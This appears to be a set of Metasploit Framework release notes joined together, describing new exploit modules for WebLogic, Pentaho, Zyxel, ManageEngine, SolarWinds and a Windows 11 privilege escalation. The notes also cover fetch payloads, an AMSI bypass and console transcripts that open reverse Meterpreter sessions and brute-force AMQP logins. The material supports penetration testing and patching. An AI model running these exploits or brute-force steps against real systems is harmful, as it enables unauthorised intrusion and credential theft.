Pull request: #17946 contributed by gwillcox-r7
AttackerKB reference: CVE-2023-21839

Description: This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic. Successful exploitation results in remote code execution as the oracle user.

Three x86 Linux Fetch Payloads

Author: Spencer McIntyre
Type: Payload
Pull request: #18084

Description: Fetch and execute a x86 payload from an HTTP server. These modules were developed live on stream. Fetch based payloads offer a shorter path from command injection to a Metasploit session

Authors: Daniel López Jiménez (attl4s) and Simone Salucci (saim1z)
Type: Post
Pull request: #18022 contributed by attl4s

Description: This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.

Enhancements and features (11)

• #17336 from smashery - This PR adds new code to simplify and standardize windows version checking and comparisons.
• #17781 from araout42 - Adds support for module writers to supply a custom include_dirs array when using the MinGW library to compile payloads.
• #17942 from cdelafuente-r7 - The script generated by the web_delivery module is blocked by the Antimalware Scan Interface (AMSI) on newer versions of windows. This PR includes an enhancement which allows the web_delivery module to bypass AMSI.
• #17955 from jvoisin - Reduces the size of PHP payloads such as php/reverse_php.
• #18050 from adfoster-r7 - Adds a new post/test/all module which will run all available post/test modules against the open session.
• #18069 from sempervictus - This updates the LDAP server library to handle unbind requests.
• #18089 from shellchocolat - Adds supports for masm output format when generating payloads.
• #18106 from adfoster-r7 - This PR updates Meterpreter's setg SessionTLVLogging true support to no longer truncate useful values such as payload UUIDs, file paths, executed commands etc.
• #18109 from adfoster-r7 - Update test post modules to always have a clean, writable, and consistent test file system directory when running modules under the loadpath test/modules directory.
• #18110 from adfoster-r7 - When running test modules that have been loaded by loadpath test/modules, any verbose printing logic generated will now be prefixed by the current test that is being run.
• #18115 from adfoster-r7 - This PR updates unknown windows errors on python Meterpreter to include original error code.

Bugs fixed (15)

• #18051 from adfoster-r7 - Adds additional skip calls to the test/post modules to ensure that only relevant test expectations are run against the specified session without crashes.
• #18054 from bwatters-r7 - This PR fixes the issue where an ArgumentError was thrown on the FETCH_SRVHOST option when running the info command when using a fetch payload.
• #18068 from smashery - Fixes a bug that caused multi/manage/shell_to_meterpreter to not break when win_transfer=VBS was set.
• #18076 from smashery - This fixes a bug in the Windows Meterpreter's memory free API.
• #18083 from zeroSteiner - A bug has been fixed in the stdapi extension of Meterpreter when calling the stdapi_sys_process_memory_free command. This incorrectly handled memory, leading to a double free condition, which would crash Meterpreter. This has since been fixed.
• #18090 from adfoster-r7 - The auxiliary/admin/kerberos/keytab EXPORT action will now consistently order exported entries.
• #18097 from adfoster-r7 - This PR fixes Python Meterpreter sessions from crashing when extracting macOS network configuration when using the route or ipconfig commands.
• #18098 from adfoster-r7 - This PR Fixes rex-text crashes when running ruby 3.3.
• #18099 from adfoster-r7 - This PR fixes Python Meterpreter subprocess deadlock and file descriptor leak caused by the stdout/stderr file descriptors not being closed.
• #18101 from adfoster-r7 - This PR fixes a Python Meterpreter macOS route command crash when ifconfig has a gateway name as a mac address separated by dots.
• #18102 from adfoster-r7 - This PR adds a fix for false negatives on files not existing on windows python Meterpreter.
• #18105 from adfoster-r7 - This PR fixes a bug when running the time command in msfconsole with complex commands.
• #18108 from adfoster-r7 - Updates the test/services module to more consistently pass. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
• #18111 from adfoster-r7 - This PR fixes an initialized constant error when Meterpreter registry key reads timeout.
• #18112 from adfoster-r7 - This PR fixes a symlink test bug when running python Meterpreter on windows.

Documentation added (1)

• #18058 from gwillcox-r7 - Adds additional details on how to navigate the Metasploit codebase.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.20...6.3.21
• Full diff 6.3.20...6.3.21

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Chaining for the win #1: Pentaho Business Server

This week, our very own jheysel-r7 added an exploit module that leverages two vulnerabilities in Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x. The module chains an authentication bypass (CVE-2022-43939) and Server Side Template Injection - SSTI - (CVE-2022-43769) to achieve unauthenticated code execution as the user running the application. Patches are available and It is highly recommended to apply them as soon as possible. The exploit is straightforward to execute and very reliable.

Chaining for the win #2: Zyxel

Community contributor h00die-gr3y added another exploit module that also chains two vulnerabilities, this time targeting Zyxel devices. It exploits an unauthenticated local file disclosure - LFI - (CVE-2023-28770) vulnerability and a weak password derivation algorithm to obtain unauthenticated remote code execution as the supervisor user. These vulnerabilities affect the zhttpd and zcmd binaries, respectively, which are present on more than 40 Zyxel routers and CPE devices. The module leverages a LFI to read the entire configuration of the router, from which it derives the supervisor password by exploiting a weak password derivation algorithm. Finally, if the device is reachable via SSH, the module establishes a connection using the leaked supervisor credentials to execute commands.

GSoC Project: Enable HTTP-Trace for scanner modules

One more successful GSoC project to enhance Metasploit has landed this week. Contributor 3V3RYONE, extended the HTTP-Trace capability to login scanner modules, which was only available to exploit modules before. That's a very useful feature to debug a module by allowing users to display the full HTTP requests and responses of scanner modules within msfconsole. More information about previous Metasploit GSoC projects can be found here.

Here is an example output of a login scanner module running with the HTTPTrace feature enabled:

msf6 > use auxiliary/scanner/http/buffalo_login 
msf6 auxiliary(scanner/http/buffalo_login) > set RHOSTS www.example.com
RHOSTS => www.example.com
msf6 auxiliary(scanner/http/buffalo_login) > set USERPASS_FILE data/wordlists/http_default_userpass.txt
USERPASS_FILE => data/wordlists/http_default_userpass.txt
msf6 auxiliary(scanner/http/buffalo_login) > set HttpTrace true
HttpTrace => true
msf6 auxiliary(scanner/http/buffalo_login) > run

####################
# Request:
####################
POST /dynamic.pl HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

bufaction=verifyLogin&user=connect&password=connect
####################
# Response:
####################
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Mon, 26 Sep 2022 06:21:16 GMT
Connection: close

[...]

New module content (3)

Zyxel chained RCE using LFI and weak password derivation algorithm

Authors: Bogi Napoleon Wennerstrøm, SEC Consult Vulnerability Lab, Thomas Rinsma, and h00die-gr3y
Type: Exploit
Pull request: #17881 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-28770

Description: This adds a new exploit module that leverages multiple vulnerabilities in the zhttpd and zcmd binaries, which are present on more than 40 Zyxel routers and CPE devices, to achieve remote code execution as user supervisor. This chains a local file disclosure vulnerability that allows an unauthenticated attacker to read the configuration file and a weak password derivation algorithm vulnerability. The module uses the leaked credentials to establish a SSH connection and execute commands.

Pentaho Business Server Auth Bypass and Server Side Template Injection RCE

Authors: Harry Withington, dwbzn, and jheysel-r7
Type: Exploit
Pull request: #17964 contributed by jheysel-r7
AttackerKB reference: CVE-2022-43939

Description: A new module has been added which exploits Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x. To do this it first exploits CVE-2022-43939 to bypass authentication before using CVE-2022-43769, a Server Side Template Injection (SSTI) vulnerability, to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.

ManageEngine ADAudit Plus Authenticated File Write RCE

Authors: Erik Wynter and Moon
Type: Exploit
Pull request: #17133 contributed by ErikWynter
AttackerKB reference: CVE-2021-42847

Description: A new exploit module has been added which gains authenticated RCE on ManageEngine AdAudit builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, CVE-2021-42847 is utilized to gain RCE as the user running AdAudit, which will typically be a local administrator, via an arbitrary file write to create the necessary script for the alert profile.

Enhancements and features (3)

• #17060 from 3V3RYONE - Updates the HTTP scanner modules with the functionality to log both HTTP requests and responses. This functionality can be enabled with set HTTPTrace true. This functionality is useful for debugging modules. In scenarios where the traffic is encrypted, for instance with WinRM, the logged values will be unencrypted.
• #17807 from gwillcox-r7 - Adds documentation for Metasploit's folder structure, so that those unfamiliar with Metasploit can quickly get up to speed and understand where files might be located or where to place new files when developing content for Metasploit.
• #17972 from h00die - Updates the example modules to align with the latest Metasploit framework module conventions.

Bugs fixed (2)

• #17968 from zeroSteiner - A bug has been fixed where Certificate Templates were not being identified as vulnerable when there was an ACE that granted enrollment rights but did not correspond to any object types. The logic has now been updated so that only ACEs associated with an object that is neither the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT right nor the CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT right will be ignored.
• #17980 from sempervictus - This fixes the file system path check used by PowerShell sessions.

Documentation added (1)

• #17984 from adfoster-r7 - Fixes a Kerberos datastore name typo in the WinRM wiki docs.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.15...6.3.16
• Full diff 6.3.15...6.3.16

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Windows 11 ADF WinSock Priv Esc

The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write primitive on Windows 11. This exploit is a write-where bug that allows arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f .

Example running with Windows 11 Version 22H2 Build 22621.963 x64:

msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 3748 launched.
[*] Reflectively injecting the DLL into 3748...
[*] Sending stage (200774 bytes) to 192.168.100.9
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
meterpreter >

SolarWinds RCE and AMQP Support

Metasploit 6.3.10 now has support for the Advanced Message Queuing Protocol (AMQP). This protocol is used in services such as RabbitMQ. Three new modules have been added that leverage this functionality thanks to the work of our very own Spencer McIntyre:

The exploits/windows/misc/solarwinds_amqp_deserialization module adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform's SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. Example targeting SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64:

msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
meterpreter >

The auxiliary/scanner/amqp/amqp_version module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers:

msf6 > use auxiliary/scanner/amqp/amqp_version
msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf6 auxiliary(scanner/amqp/amqp_version) > run
[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_version) > services 
Services
========
host             port  proto  name   state  info
----             ----  -----  ----   -----  ----
192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
                                            AIN)
192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
msf6 auxiliary(scanner/amqp/amqp_version) 

The new auxiliary/scanner/amqp/amqp_login module can be used to bruteforce service credentials:

msf6 > use auxiliary/scanner/amqp/amqp_login 
msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
PASS_FILE => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
RPORT => 5672
msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/amqp/amqp_login) > run
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[+] 192.168.159.128:5672 - Login Successful: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_login) > 

New module content (5)

AMQP 0-9-1 Login Check Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17828 contributed by zeroSteiner

Description: This adds a login scanner module for AMQP services

AMQP 0-9-1 Version Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17827 contributed by zeroSteiner

Description: This adds a scanner module that extracts version information from AMQP protocol servers.

Optergy Proton and Enterprise BMS Command Injection using a backdoor

Authors: Gjoko Krstic and h00die-gr3y
Type: Exploit
Pull request: #17806 contributed by h00die-gr3y
AttackerKB reference: CVE-2019-7276

Description: This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.

Ancillary Function Driver (AFD) for WinSock Elevation of Privilege

Authors: Christophe De La Fuente, Yarden Shafir, b33f, and chompie
Type: Exploit
Pull request: #17826 contributed by cdelafuente-r7
AttackerKB reference: CVE-2023-21768

Description: This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 2H22.

SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE

Authors: Justin Hong, Lucas Miller, Piotr Bazydło, and Spencer McIntyre
Type: Exploit
Pull request: #17785 contributed by zeroSteiner
AttackerKB reference: CVE-2022-38108

Description: This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.

Enhancements and features (6)

• #17724 from dwelch-r7 - Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations
• #17753 from adfoster-r7 - Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal
• #17789 from bcoles - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
• #17789 from bcoles - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
• #17813 from samueloph - This sets the CHECK_FALSE option to true by default so that the scanner will bail upon detecting false positive results.
• #17833 from adfoster-r7 - Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method

Bugs fixed (6)

• #17704 from ide0x90 - Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
• #17808 from adfoster-r7 - Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine - a digital archive of the world wide web founded by the Internet Archive.
• #17818 from adfoster-r7 - This PR fixes a crash in the RPC job info command.
• #17825 from dm-ct - Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module
• #17830 from bcoles - Fixes a crash when parsing dates in ./tools/modules/committer_count.rb
• #17831 from dm-ct - Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.9...6.3.10
• Full diff 6.3.9...6.3.10

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).